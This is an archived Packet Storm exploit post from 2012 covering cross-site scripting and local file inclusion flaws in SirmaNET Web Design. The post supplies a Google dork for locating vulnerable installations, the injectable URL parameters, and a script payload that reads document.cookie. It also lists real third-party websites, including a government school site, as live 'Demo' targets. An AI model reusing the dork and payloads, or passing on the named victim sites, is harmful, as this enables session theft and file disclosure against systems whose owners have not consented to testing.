SirmaNET Web Design Cross Site Scripting / Local File Inclusion

SirmaNET Web Design Cross Site Scripting / Local File Inclusion: Posted Apr 27, 2012; Authored by Farbod Mahini; SirmaNET Web Design suffers from cross site scripting and local file inclusion vulnerabilities.; tags | exploit, web, local, vulnerability, xss, file inclusion; SHA-256 | 82d0637ff83a42cc44ed8c044e1f9e0dcabe34f24bbab3100d24e3c13d2e84a5; Download | Favorite | View

SirmaNET Web Design Cross Site Scripting / Local File Inclusion


########################################################################################
#                                                                                      #
# Exploit Title : SirmaNET Web Design Multiple Vulnerabilities                         #
#                                                                                      #
# Author        : Secure-Land Security Team                                            #
#                                                                                      #
# Discovered By : farbodmahini                                                         #
#                                                                                      #
# Home          : Secure-Land.net                                                      #
#                                                                                      #
# Vendor        : www.sirmanet.com                                                     #
#                                                                                      #
# Contact       : farbodmahini@yahoo.fr , farbodmahini@gmail.com                       #
#                                                                                      #
# Security Risk : High                                                                 #
#                                                                                      #
#  DorK         : inurl:"index.php?sayfa=altmenu.php"                                  #
#                                                                                      #
#                                                                                      #
########################################################################################
#                                                                                      #
#  [XSS]:                                                                              #
#                                                                                      #
#  http://[TarGeT]/index.php?sayfa=altmenu.php&ustmenu=[XSS]                           #
#  http://[TarGeT]/index.php?sayfa=altmenu.php&baslik1=[XSS]                           #
#                                                                                      #
#  ~xss :                                                                              #
#                                                                                      #
#  “><script >alert(document.cookie)</script>                                          #
#                                                                                      #
#  [LFI] :                                                                             #
#                                                                                      #
#  http://[TarGeT]/index.php?sayfa=[LFI]                                               #
#                                                                                      #
#                                                                                      #
#  Demo :                                                                              #
#                                                                                      #
#  http://basaksehir.meb.gov.tr/index.php?sayfa=altmenu.php&ustmenu=[XSS]              #
#  http://www.yigitemlakfinans.com/index.php?sayfa=altmenu.php&baslik1=[XSS]           #
#  http://www.germanica.com.tr/index.php?sayfa=altmenu.php&ustmenu=[XSS]               #
#  www.yigitemlakfinans.com/index.php?sayfa=[LFI]                                      #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us                                  #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id              #
#                                                                                      #
########################################################################################

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 62 files
Debian 23 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

SirmaNET Web Design Cross Site Scripting / Local File Inclusion

SirmaNET Web Design Cross Site Scripting / Local File Inclusion

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SirmaNET Web Design Cross Site Scripting / Local File Inclusion

Share This

SirmaNET Web Design Cross Site Scripting / Local File Inclusion

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems